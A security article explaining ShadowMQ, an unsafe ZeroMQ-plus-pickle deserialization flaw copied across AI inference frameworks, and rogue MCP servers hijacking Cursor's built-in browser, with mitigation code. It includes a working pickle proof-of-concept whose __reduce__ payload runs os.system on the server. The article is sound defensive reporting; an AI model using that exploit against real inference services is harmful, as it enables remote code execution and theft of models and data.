Modern AI stacks shipped a cluster of bugs that look almost custom-built for attackers. Critical remote code execution flaws in inference frameworks from Meta, NVIDIA, Microsoft, and open-source projects like vLLM, SGLang, and Modular Max Server all trace back to the same design mistake: unsafe ZeroMQ messaging combined with Python pickle deserialization. At the same time, research into Cursor's AI-powered IDE shows that attackers can hijack its built-in browser and turn a developer workstation into a fully privileged malware delivery platform.
Together, these issues show how quickly insecure patterns can propagate across AI infrastructure and development tools when teams copy architecture and code without hardening it. For defenders, they are a concrete reminder that "AI security" is not theoretical anymore; it is a classic RCE and supply-chain problem wearing a new label.
ShadowMQ: Unsafe ZeroMQ + pickle as a pattern, not a single bug
The first piece of the picture sits inside Meta's Llama Stack. In affected versions, the framework exposed a ZeroMQ socket over the network and then used recv_pyobj() to deserialize incoming traffic via Python's pickle module. In other words, any endpoint that could talk to that socket could send a crafted object and gain remote code execution on the inference node. That flaw shipped as CVE-2024-50050 and was later patched by switching to safer JSON-based serialization.
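To make the pattern concrete, here is a minimal sketch of the vulnerable shape, not Llama Stack's actual code: a pyzmq service that deserializes whatever arrives via recv_pyobj(), and an attacker-side object whose __reduce__ method runs a command the moment the server unpickles it. The bind address and the benign touch payload are illustrative.

```python
# Minimal sketch of the ShadowMQ-style flaw (illustrative only, not the
# real Llama Stack code). recv_pyobj() runs pickle.loads() on raw bytes.
import os
import zmq

def vulnerable_server(bind_addr: str = "tcp://0.0.0.0:5555") -> None:
    ctx = zmq.Context()
    sock = ctx.socket(zmq.REP)
    sock.bind(bind_addr)            # reachable by anything on the network
    while True:
        msg = sock.recv_pyobj()     # pickle.loads() on attacker-controlled data
        sock.send_pyobj({"ok": True, "echo": repr(msg)})

class Payload:
    """pickle calls __reduce__ during deserialization, so receiving this
    object executes the command; the harmless `touch` stands in for RCE."""
    def __reduce__(self):
        return (os.system, ("touch /tmp/pwned-by-pickle",))

def exploit(server_addr: str = "tcp://victim:5555") -> None:
    ctx = zmq.Context()
    sock = ctx.socket(zmq.REQ)
    sock.connect(server_addr)
    sock.send_pyobj(Payload())      # server runs os.system() on receipt
    sock.recv_pyobj()
```

The point of the sketch is that recv_pyobj() is pickle.loads() in disguise: on a flat network, that one call is the entire exploit.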
However, the more serious story is what happened next. The same unsafe pattern (ZeroMQ sockets exposed over TCP, unauthenticated endpoints, and direct pickle deserialization) showed up across multiple AI inference frameworks maintained by different vendors and communities. Oligo's research team labeled this propagation pattern ShadowMQ: an architecture bug that quietly spread through the ecosystem as teams copied and adapted reference code.
As the analysis expanded, researchers documented near-identical logic in:
- vLLM (CVE-2025-30165)
- NVIDIA TensorRT-LLM (CVE-2025-23254)
- Modular Max Server (CVE-2025-60455)
- Microsoft's Sarathi-Serve and the SGLang project, with partial or incomplete fixes at disclosure time.
From a defensive perspective, ShadowMQ matters less as "just a bug" and more as a supply-chain symptom. When core AI frameworks publish vulnerable patterns in their reference designs, that code doesn't stay local; it shows up in forks, wrappers, and vendor products that trust the original implementation. That is exactly what we see here.
How these AI bugs turn into real attack chains
In practice, exploitation still requires an attacker to reach the ZeroMQ endpoints. However, many AI deployments run inference servers inside flat internal networks, on shared Kubernetes clusters, or behind load balancers that developers treat as "trusted." Once an attacker lands anywhere in that environment (via compromised credentials, a cloud misconfiguration, or a separate application bug), they can:
- Connect to the exposed ZMQ socket.
- Ship a malicious pickle object that abuses the unsafe recv_pyobj() logic.
- Gain code execution on the inference node and pivot across the AI cluster.
At that point, the difference between "AI bug" and "standard infrastructure compromise" disappears. Attackers can:
- Steal model weights and training data.
- Tamper with responses and silently poison downstream applications.
- Deploy additional malware such as crypto-miners or lateral-movement tooling.
Because these inference engines often sit at the center of latency-sensitive workloads, defenders rarely instrument them as heavily as traditional front-end services. As a result, a ShadowMQ exploit can look like "just another internal service talking to the model," while in reality it runs arbitrary Python code inside the cluster.
Echoes of Llama's CVE-2024-50050 in vLLM, TensorRT-LLM, and other frameworks
Meta's Llama-Stack vulnerability (CVE-2024-50050) was the first widely documented example. The fix replaced pickle with JSON and tightened the messaging interface.
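The patched shape is easy to mirror in any ZeroMQ service. Here is a minimal sketch of the safer pattern, illustrative rather than Meta's actual patch: exchange JSON with an explicit field allowlist instead of pickled objects.

```python
# Safer replacement sketch: JSON messages plus an explicit field allowlist.
# Illustrative only; the key names are hypothetical, not Meta's patch.
import zmq

ALLOWED_KEYS = {"op", "request_id", "prompt"}   # hypothetical message schema

def safe_server(bind_addr: str = "tcp://127.0.0.1:5555") -> None:
    ctx = zmq.Context()
    sock = ctx.socket(zmq.REP)
    sock.bind(bind_addr)
    while True:
        msg = sock.recv_json()                  # json.loads(): data, not code
        if not isinstance(msg, dict) or set(msg) - ALLOWED_KEYS:
            sock.send_json({"error": "rejected: unexpected message shape"})
            continue
        sock.send_json({"ok": True, "request_id": msg.get("request_id")})
```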
Later, as researchers audited related projects, they found:
- vLLM's V0 engine accepted data from a ZeroMQ SUB socket and deserialized it using pickle, enabling RCE across nodes in a multi-host deployment (CVE-2025-30165).
- NVIDIA TensorRT-LLM shipped a Python executor flaw (CVE-2025-23254) that allowed lower-privilege access to escalate into full code execution and data tampering on the inference server.
- Modular Max Server and SGLang reused logic adapted from vLLM, carrying the same unsafe pattern forward in slightly altered form.
For defenders, this looks very similar to what we already know from classic OSS supply-chain incidents. Reference code that uses unsafe deserialization with pickle and ZeroMQ becomes a template. Even if each project tweaks names or control flow, the underlying risk remains identical.
Cursor's browser and rogue MCP servers: turning AI IDEs into malware delivery platforms
The second half of the research focuses on Cursor, an AI-powered code editor built on top of the VS Code / Electron stack. Its new built-in browser and Model Context Protocol (MCP) support give AI agents more reach into web apps and internal tools. Unfortunately, they also give attackers a much larger attack surface.
Knostic's analysis shows that a malicious local MCP server can:
- Register itself via a benign-looking mcp.json config (an illustrative example follows this list).
- Inject JavaScript into Cursor's internal browser at runtime.
- Replace real login pages with phishing pages that steal credentials and send them to an attacker-controlled endpoint.
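For context, Cursor registers MCP servers through a JSON config, and a rogue entry does not look obviously different from a legitimate helper. The entry below is invented for illustration; the server name, command, and path are assumptions, not taken from a real attack.

```json
{
  "mcpServers": {
    "docs-helper": {
      "command": "node",
      "args": ["./tools/docs-helper/index.js"]
    }
  }
}
```

Nothing in that config signals intent; whether "docs-helper" summarizes documentation or injects JavaScript into the IDE's browser depends entirely on the code behind it.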
Because Cursor inherits Node.js and Electron's privileges, malicious JavaScript running in that context can access local files, modify extensions, and persist changes that survive restarts. Previous research into Cursor and VS Code already demonstrated similar risks under names like "CurXecute" and "MCPoison," where flawed MCP handling enabled remote or arbitrary code execution against developer machines.
In other words, once an attacker convinces a developer to enable a rogue MCP server or install a compromised extension, the IDE effectively becomes an elevated malware agent. It can read SSH keys, manipulate repos, poison CI pipelines, and push backdoored code into production.
Why these bugs show a broader AI supply-chain problem
From a seasoned defender's perspective, none of this is really "new." We have seen unsafe deserialization, over-privileged services, and IDE extension abuse for years. What changed is the velocity and blast radius. AI frameworks and MCP servers are:
- widely reused as reference implementations,
- packaged into turnkey stacks and SaaS offerings, and
- deployed deep inside both infrastructure and developer workflows.
As a result, a single design mistake, like treating ZeroMQ + pickle as "good enough" for internal messaging or trusting MCP servers by default, can propagate into hundreds or thousands of downstream environments. When those components sit next to GPUs, production models, or CI/CD secrets, the risk profile escalates quickly.
Practical defense: what to change in AI infra and dev tooling
For AI platform teams, a few moves now pay off later:
First, treat inference engines as trust boundaries, not internal plumbing. That means blocking direct network exposure for ZeroMQ and similar protocols, using mTLS or authenticated channels where possible, and isolating inference nodes into dedicated segments with tight egress controls.
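Where ZeroMQ has to stay, pyzmq's built-in CURVE support provides an encrypted, key-authenticated channel with a few socket options. A minimal sketch, assuming key pairs are generated ahead of time and distributed out of band:

```python
# Sketch of CURVE-authenticated ZeroMQ in pyzmq (requires libzmq built
# with curve support). Key distribution is assumed to happen out of band.
import zmq

server_public, server_secret = zmq.curve_keypair()
client_public, client_secret = zmq.curve_keypair()

ctx = zmq.Context()

server = ctx.socket(zmq.REP)
server.curve_server = True              # enable CURVE on the server side
server.curve_secretkey = server_secret
server.curve_publickey = server_public
server.bind("tcp://127.0.0.1:5556")     # bind narrowly, never 0.0.0.0

client = ctx.socket(zmq.REQ)
client.curve_secretkey = client_secret
client.curve_publickey = client_public
client.curve_serverkey = server_public  # client must pin the server's key
client.connect("tcp://127.0.0.1:5556")
```

This encrypts traffic and pins the server's identity; restricting which client keys may connect additionally requires pyzmq's zmq.auth ZAP handler.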
Second, aggressively eliminate unsafe deserialization. If any component uses Python's pickle, Java's native serialization, or similar formats to deserialize untrusted or semi-trusted data from the network, that code should be treated as a vulnerability until proved otherwise. Safer formats (JSON, Protobuf, Cap'n Proto) and strict schema validation should be the baseline.
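"Strict schema validation" can be as simple as a declarative schema checked before any field is used. A sketch using the third-party jsonschema package; the message schema itself is hypothetical:

```python
# Validate every inbound message against a strict schema before use.
# Uses the third-party `jsonschema` package; the schema is hypothetical.
import json
from jsonschema import ValidationError, validate

MESSAGE_SCHEMA = {
    "type": "object",
    "properties": {
        "op": {"type": "string", "enum": ["generate", "health"]},
        "request_id": {"type": "string", "maxLength": 64},
        "prompt": {"type": "string", "maxLength": 8192},
    },
    "required": ["op", "request_id"],
    "additionalProperties": False,       # reject anything outside the schema
}

def parse_message(raw: bytes) -> dict | None:
    try:
        msg = json.loads(raw)            # plain data, no object reconstruction
        validate(instance=msg, schema=MESSAGE_SCHEMA)
    except (json.JSONDecodeError, ValidationError):
        return None                      # drop malformed or off-schema input
    return msg
```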
Third, extend ransomware-style hardening to AI clusters. That includes strict identity for machine-to-machine traffic, dedicated backup strategies for model artifacts and training data, and continuous inventory of where each inference framework version runs inside the estate.
On the developer side, organizations should treat AI-powered IDEs like any other high-value endpoint:
- Disable or constrain Auto-Run behavior for MCP servers and extensions.
- Maintain a curated allowlist of trusted MCP servers, with code review requirements and explicit ownership.
- Monitor for new or unapproved MCP endpoints and browser components inside IDEs (one lightweight approach is sketched after this list).
- Educate developers that "AI helper servers" are remote code execution vectors, not harmless sidecars.
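As a lightweight starting point for the monitoring item above, endpoint teams can diff discovered MCP configs against an approved list. The sketch below assumes a config location and allowlist; both are illustrative rather than Cursor-documented guarantees.

```python
# Sketch: flag MCP server entries that are not on an approved allowlist.
# The search glob and the allowlist contents are illustrative assumptions.
import json
from pathlib import Path

APPROVED_SERVERS = {"docs-helper"}       # hypothetical vetted entries
CONFIG_GLOB = "**/.cursor/mcp.json"      # assumed config location

def audit_mcp_configs(root: Path) -> list[str]:
    findings = []
    for cfg_path in root.glob(CONFIG_GLOB):
        try:
            data = json.loads(cfg_path.read_text())
        except (OSError, json.JSONDecodeError):
            continue
        servers = data.get("mcpServers", {}) if isinstance(data, dict) else {}
        for name in servers:
            if name not in APPROVED_SERVERS:
                findings.append(f"{cfg_path}: unapproved MCP server '{name}'")
    return findings

if __name__ == "__main__":
    for finding in audit_mcp_configs(Path.home()):
        print(finding)
```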
Finally, AI security needs to plug into existing threat-modeling and vulnerability-management programs, not operate as a separate track. ShadowMQ and the Cursor browser bugs are classic examples of why: they are not "prompt injection problems," they are direct RCE and supply-chain issues that just happen to live inside AI-branded software.
FAQs
Q: What is ShadowMQ in the context of AI security?
A: ShadowMQ is a pattern where AI frameworks reuse ZeroMQ messaging code that deserializes network data with Python's pickle, creating repeatable RCE conditions across Meta Llama-Stack, vLLM, TensorRT-LLM, and related projects.
Q: How serious are the CVEs tied to these AI inference engines?
A: CVE-2024-50050, CVE-2025-30165, and CVE-2025-23254 all enable code execution on inference servers under realistic conditions, which can lead to model theft, data exposure, and further compromise of connected systems.
Q: Do these vulnerabilities require direct internet exposure of the AI service?
A: Not necessarily. Attackers can often reach ZeroMQ endpoints from inside the network after exploiting other services, misconfigurations, or stolen credentials, then use ShadowMQ-style flaws as a lateral-movement amplifier.
Q: How can a rogue MCP server compromise a developer using Cursor?
A: A malicious MCP server can inject JavaScript into Cursor's built-in browser, replace login flows with phishing pages, and run with the IDE's privileges to read files, modify extensions, and persist malware inside the development environment.
Q: What are the most effective short-term mitigations?
A: Inference teams should disable unsafe serialization, patch to fixed versions, and isolate AI services. Developer teams should lock down MCP usage, vet extensions, and treat AI IDEs as privileged endpoints that require monitoring and hardening.